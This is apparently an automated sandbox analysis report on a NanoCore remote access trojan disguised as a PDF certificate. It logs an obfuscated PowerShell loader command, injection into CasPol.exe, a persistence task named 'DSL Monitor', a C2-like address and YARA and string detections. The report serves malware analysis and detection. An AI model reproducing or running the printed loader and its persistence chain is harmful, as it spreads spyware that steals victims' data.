Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4F	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#fordaervet kauch ticklenburg synonymized nippers hysse #>$boarspear = """pe;ref susunskc otpri po cn d aebcartju cd kg coasmsemdee m0wa4 k b{st do tr u kopteafor oaatmno(ov[haspot fr uislnspgvo] h`$pis ca ulsteans fwdio om fe un p)re; d de d a d`$ rt fh vichoopt ch wr ti ex t no= r snnoeinwud-ocoreb ujfoe scgotoc mebmiyldtprein[fo] p sc(ib`$ csspa ll ueens mwseogdm bedynan.inl de an bgjot ch p fo/co a2su) i; d ma sc f flffyoslrme(sc`$ pa dnpitpai flmuatrbaso prsks k=pa0ra;bi b`$baa nn gtpoi llsparabhvo srbls v pr- ml atbo fa`$pasdia slopebaslew so sm ze mnsl.lylvaedrn yg ft dh t;il lf`$ pa pnhyt ci nlekatabfiostrsks c+ i=li2an)af{ku d sk e st ku pe fo fa`$ekt bhsei sogutbehinr uivaxun[ta`$biayondat sirelima abguo nr ws t/ t2 p] f no= o pa[uncgloinn bvpye sruntse]im: u:cattho pbsyyantaueun(fj`$ ss ia tl semes fw bo bmfoebonsu.kls au kb ss mtlor tispnang z(st`$phaunnsatbui hlfoamybmiosortus d, i er2un) g,in au1mu6ca)mi;en re ti`$ret fh siroofit sh prsoi dxsv[ar`$gaacintrtedi slbra nbino or asta/tr2sk]br p=ud un(su`$satithefibao ct bhalrfli txga[pa`$snawinbrt ciunlkraodbmeo arhlsmi/sp2vi]br l-fobvaxspoderca k1 s1fo8mb) f;sy p l y ty}re ki[ dsent sr fiannstgsl]st[sas kygis lt ue fmpa. stple pxgotab. sebrnsuc ko rdafiunn pg b] k: s: ra is scsli lino.teg de btamsditpur zi pnhag t(ca`$datgrhciiscountruhrorusisax m)as;dd} s`$vis pkoarfim ga ar mbmae sjamd re osep0 o=inbderbauvid sgnooinmhymskeda0ar4 i bo' d2ek5nu0stffa0hu5 s0un2dj1 u3de1 tb k5cl8 t1ma2 i1 naan1biape' s;pr`$ ksudklarmum jaudrafb reklj adakebrsst1fo=gobbrr putrdpegprolam pmame p0gu4 r uf' r3mibbl1ynfas1 r5ec0my4 m1 s9ro0de5 s1bj9 n1 h0ga0 u2 m5ra8no2 a1de1 sfto1 i8 r4op5 r4pa4ni5 s8 j2 o3st1ko8 s0be5in1in7ud1ov0fo1 b3 s3un8bi1 l7 l0 k2fl1 mf e0ma0ov1qu3ge3 bber1de3cl0fi2 k1 oesc1 b9 l1 a2 m0 b5ko'ou; f`$sls skhkrstm caanr ubexe ajkodtre assk2ge= fbgar suscdimgskokam sm depr0co4br sa' a3 s1ko1sj3ja0 s2un2 l6sc0bu4 m1be9 i1 g5 d3sp7 s1dy2wi1 s2 g0 e4 p1in3 a0 v5bt0bu5in'mo;sm`$prssik irgrmafa arunbste sjmodpievas h3av=pjb mr bu udolg wowim mm me u0ha4 s de' f2 v5sw0obfas0fo5 b0 s2ma1 s3 s1 fbmo5do8ge2v 4us0 a3 s1 m8xa0sl2fl1vef s1deb q1 u3ma5 a8re3anfwi1 g8 t0 d2sy1po3ny0 d4bo1 e9 s0fo6 p2av5 l1re3un0sn4ag0co0ba1 ff t1 p5 o1ke3 c0bo5 o5un8no3 se p1re7 t1nu8vr1gr2 r1mia s1ra3ge2un4 u1ov3 c1ud0hd'ro;ru`$jos ukafr sm iasermob iefljuddwiefes g4 k= ib krdrutiddegnoo cmbim kewa0 p4ru se'te0di5re0un2pr0co4 r1brfsp1se8 g1fl1pu'il;se`$kesfukufrthm na lrvib se fj udpaebasan5un=stbdyr au tdsjg pokumldm te l0im4lo ne'gy3pe1bl1 d3hy0br2ko3libpa1be9ma1vi2tr0su3se1 pa t1 m3mo3haesu1no7gr1 r8 t1ke2st1 sa u1st3 v'ji;tr`$bestakmir hmdoa frsvbvieoljlad cetrsaf6 d=peb crmau rdregmio wm bmboe u0bl4 f my' v2rn4ge2ge2 g2cl5 a0on6 f1ti3ap1hj5sj1atfsk1 f7 t1 ma s3 c8 m1 n7ok1 tb e1fo3 b5praut5eu6dv3 ve s1 if e1bo2hy1 v3 a3 e4 b0rofre2fa5 o1 afal1fa1te5boa i5be6 h2 r6 b0su3sm1 g4f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#fordaervet kauch ticklenburg synonymized nippers hysse #>$boarspear = """pe;ref susunskc otpri po cn d aebcartju cd kg coasmsemdee m0wa4 k b{st do tr u kopteafor oaatmno(ov[haspot fr uislnspgvo] h`$pis ca ulsteans fwdio om fe un p)re; d de d a d`$ rt fh vichoopt ch wr ti ex t no= r snnoeinwud-ocoreb ujfoe scgotoc mebmiyldtprein[fo] p sc(ib`$ csspa ll ueens mwseogdm bedynan.inl de an bgjot ch p fo/co a2su) i; d ma sc f flffyoslrme(sc`$ pa dnpitpai flmuatrbaso prsks k=pa0ra;bi b`$baa nn gtpoi llsparabhvo srbls v pr- ml atbo fa`$pasdia slopebaslew so sm ze mnsl.lylvaedrn yg ft dh t;il lf`$ pa pnhyt ci nlekatabfiostrsks c+ i=li2an)af{ku d sk e st ku pe fo fa`$ekt bhsei sogutbehinr uivaxun[ta`$biayondat sirelima abguo nr ws t/ t2 p] f no= o pa[uncgloinn bvpye sruntse]im: u:cattho pbsyyantaueun(fj`$ ss ia tl semes fw bo bmfoebonsu.kls au kb ss mtlor tispnang z(st`$phaunnsatbui hlfoamybmiosortus d, i er2un) g,in au1mu6ca)mi;en re ti`$ret fh siroofit sh prsoi dxsv[ar`$gaacintrtedi slbra nbino or asta/tr2sk]br p=ud un(su`$satithefibao ct bhalrfli txga[pa`$snawinbrt ciunlkraodbmeo arhlsmi/sp2vi]br l-fobvaxspoderca k1 s1fo8mb) f;sy p l y ty}re ki[ dsent sr fiannstgsl]st[sas kygis lt ue fmpa. stple pxgotab. sebrnsuc ko rdafiunn pg b] k: s: ra is scsli lino.teg de btamsditpur zi pnhag t(ca`$datgrhciiscountruhrorusisax m)as;dd} s`$vis pkoarfim ga ar mbmae sjamd re osep0 o=inbderbauvid sgnooinmhymskeda0ar4 i bo' d2ek5nu0stffa0hu5 s0un2dj1 u3de1 tb k5cl8 t1ma2 i1 naan1biape' s;pr`$ ksudklarmum jaudrafb reklj adakebrsst1fo=gobbrr putrdpegprolam pmame p0gu4 r uf' r3mibbl1ynfas1 r5ec0my4 m1 s9ro0de5 s1bj9 n1 h0ga0 u2 m5ra8no2 a1de1 sfto1 i8 r4op5 r4pa4ni5 s8 j2 o3st1ko8 s0be5in1in7ud1ov0fo1 b3 s3un8bi1 l7 l0 k2fl1 mf e0ma0ov1qu3ge3 bber1de3cl0fi2 k1 oesc1 b9 l1 a2 m0 b5ko'ou; f`$sls skhkrstm caanr ubexe ajkodtre assk2ge= fbgar suscdimgskokam sm depr0co4br sa' a3 s1ko1sj3ja0 s2un2 l6sc0bu4 m1be9 i1 g5 d3sp7 s1dy2wi1 s2 g0 e4 p1in3 a0 v5bt0bu5in'mo;sm`$prssik irgrmafa arunbste sjmodpievas h3av=pjb mr bu udolg wowim mm me u0ha4 s de' f2 v5sw0obfas0fo5 b0 s2ma1 s3 s1 fbmo5do8ge2v 4us0 a3 s1 m8xa0sl2fl1vef s1deb q1 u3ma5 a8re3anfwi1 g8 t0 d2sy1po3ny0 d4bo1 e9 s0fo6 p2av5 l1re3un0sn4ag0co0ba1 ff t1 p5 o1ke3 c0bo5 o5un8no3 se p1re7 t1nu8vr1gr2 r1mia s1ra3ge2un4 u1ov3 c1ud0hd'ro;ru`$jos ukafr sm iasermob iefljuddwiefes g4 k= ib krdrutiddegnoo cmbim kewa0 p4ru se'te0di5re0un2pr0co4 r1brfsp1se8 g1fl1pu'il;se`$kesfukufrthm na lrvib se fj udpaebasan5un=stbdyr au tdsjg pokumldm te l0im4lo ne'gy3pe1bl1 d3hy0br2ko3libpa1be9ma1vi2tr0su3se1 pa t1 m3mo3haesu1no7gr1 r8 t1ke2st1 sa u1st3 v'ji;tr`$bestakmir hmdoa frsvbvieoljlad cetrsaf6 d=peb crmau rdregmio wm bmboe u0bl4 f my' v2rn4ge2ge2 g2cl5 a0on6 f1ti3ap1hj5sj1atfsk1 f7 t1 ma s3 c8 m1 n7ok1 tb e1fo3 b5praut5eu6dv3 ve s1 if e1bo2hy1 v3 a3 e4 b0rofre2fa5 o1 afal1fa1te5boa i5be6 h2 r6 b0su3sm1 g4f			Jump to behavior

Source: CasPol.exe, 00000005.00000002.28419341810.0000000023D70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #Program Managerknown.
Source: CasPol.exe, 00000005.00000002.28397844456.0000000021F17000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28419341810.0000000023D70000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28397844456.0000000021F21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: CasPol.exe, 00000005.00000002.28397844456.0000000021BAB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28397844456.0000000021F2B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28397844456.0000000021F28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerpo%
Source: CasPol.exe, 00000005.00000002.28397844456.00000000219F4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerp
Source: CasPol.exe, 00000005.00000002.28420339786.0000000023DDC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28420600342.0000000023E63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #Program Manager
Source: CasPol.exe, 00000005.00000002.28420600342.0000000023DF7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28420600342.0000000023DEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerknown.
Source: CasPol.exe, 00000005.00000002.28397844456.0000000021F2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerr
Source: CasPol.exe, 00000005.00000002.28420600342.0000000023DFC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28420600342.0000000023DE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:55db;192.168.11.20

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

0_2_0040336C

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Nanocore RAT

Source: Yara match	File source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR

Remote Access Functionality

Detected Nanocore Rat

Source: CasPol.exe, 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: CasPol.exe, 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: CasPol.exe, 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.Desig